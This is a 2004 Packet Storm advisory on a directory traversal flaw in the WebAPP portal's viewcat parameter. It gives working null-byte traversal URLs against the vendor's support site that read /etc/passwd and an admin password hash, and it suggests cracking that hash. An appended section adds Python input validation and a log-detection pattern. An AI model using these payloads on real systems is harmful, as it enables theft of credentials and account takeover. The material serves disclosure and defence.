webapp.traversal.txt

2004-08-26T00:00:00
ID PACKETSTORM:34142
Type packetstorm
Reporter Packet Storm
Modified 2004-08-26T00:00:00

Description

WebAPP is advertised as the internet's most feature-rich, easy-to-run
Perl-based portal system. Its home site is http://www.web-app.org/
Some of its features are:
  
- Easy to install on standard Unix servers (Windows user-supported only)
- User profiles
- Message forums
- Private messaging between members
- Blog-style news articles
- Links and downloads
- Customizable themes
- Multiple language support
- Flat-file system, no SQL database
- Membership controls
- Open source
  
Several user mods are also available, ranging from chat to
e-commerce applications.

Several vulnerabilities in these mods have already been
discovered.
  
  
  
The WebAPP system itself has a serious reverse directory
traversal vulnerability: the viewcat parameter is used to build a
file path without being checked, and a trailing null byte cuts off
whatever the script appends to it.

Example:

1) Go to http://cornerstone.web-app.org/cgi-bin/index.cgi
(this is their main support site)

2) Click on Articles on the main menu at the left side of
the screen

3) Click on any of the icons representing the misc topics
available (I chose the "bugs" section)

4) You'll wind up with the URL "http://cornerstone.web-app.org/cgi-bin/index.cgi?action=topics&viewcat=bugs"
in the address bar of your browser. Change it to
"http://cornerstone.web-app.org/cgi-bin/index.cgi?action=topics&viewcat=../../../../../../../etc/passwd%00"

5) View the HTML source for the page
  
  
  
A more interesting file to look at would be:
"http://cornerstone.web-app.org/cgi-bin/index.cgi?action=topics&viewcat=../../db/members/admin.dat%00"

View the HTML source code and scroll down until you come to
the line with:
href="index.cgi?action=viewnews&id=adUCOOzV2ljgg"></a></td>

"adUCOOzV2ljgg" is the hashed password of the Administrator.
It is a standard DES crypt(3) hash, so you can
run a password cracking program against it.

Every user has a corresponding .dat file within the
db/members directory, so the same request exposes any member's
password hash, not only the administrator's.
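As an added, defender-side example (not part of the original advisory and not WebAPP's own code), the following Python shows the input handling that closes this class of bug, and a check that flags the request pattern above in web server logs. The topics directory, the name-to-file mapping and the sample log lines are assumptions constructed for the example.

```python
import os
import re
from urllib.parse import unquote

# Assumed location of the category files index.cgi serves (not from the advisory).
TOPICS_ROOT = "/var/www/webapp/db/topics"

def resolve_viewcat(viewcat, root=TOPICS_ROOT):
    """Map a viewcat value to a file path inside root, or return None.
    Each check closes one part of the advisory's bug: an embedded NUL byte,
    path separators or '..' in the name, and any resolved path outside root."""
    if not viewcat or "\x00" in viewcat:
        return None
    # Category names are plain tokens; ../ and slashes fail this test outright.
    if not re.fullmatch(r"[A-Za-z0-9_-]{1,64}", viewcat):
        return None
    real_root = os.path.realpath(root)
    # The file name a category maps to is an assumption; WebAPP's layout is not shown.
    candidate = os.path.realpath(os.path.join(real_root, viewcat))
    # Defence in depth: the canonical path must still sit under the root.
    if os.path.commonpath([real_root, candidate]) != real_root:
        return None
    return candidate

# Detection: traversal sequences or an encoded NUL in the request line.
TRAVERSAL = re.compile(r"(\.\./|\.\.\\|%2e%2e|%00)", re.IGNORECASE)

def suspicious_requests(log_lines):
    """Return (client, request_path) for combined-log lines whose request
    shows traversal or NUL termination, checked before and after URL decoding
    so a single extra layer of encoding does not hide it."""
    hits = []
    for line in log_lines:
        m = re.match(r'(\S+) \S+ \S+ \[[^\]]+\] "(?:GET|POST) (\S+)', line)
        if not m:
            continue
        client, path = m.group(1), m.group(2)
        decoded = unquote(path)
        if TRAVERSAL.search(path) or TRAVERSAL.search(decoded) or "\x00" in decoded:
            hits.append((client, path))
    return hits

# Constructed sample log lines (not real traffic) in Apache combined format.
SAMPLE_LOG = [
    '203.0.113.5 - - [26/Aug/2004:10:00:00 +0000] "GET /cgi-bin/index.cgi?action=topics&viewcat=bugs HTTP/1.1" 200 5120',
    '203.0.113.9 - - [26/Aug/2004:10:00:07 +0000] "GET /cgi-bin/index.cgi?action=topics&viewcat=../../../../etc/passwd%00 HTTP/1.1" 200 2210',
    '203.0.113.9 - - [26/Aug/2004:10:00:12 +0000] "GET /cgi-bin/index.cgi?action=topics&viewcat=..%2F..%2Fdb%2Fmembers%2Fadmin.dat%2500 HTTP/1.1" 200 900',
]
```

Running `suspicious_requests(SAMPLE_LOG)` flags only the two requests from 203.0.113.9, the double-encoded one included, while `resolve_viewcat` returns a path for "bugs" and None for both traversal values.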
  
  
PhTeam Release  
  
Greetz to PATz, Luvchr|s, Verum, Fed-X, rebarz99, hEps,
ch1m3ra, and to the obnoxious posers in #oneball
  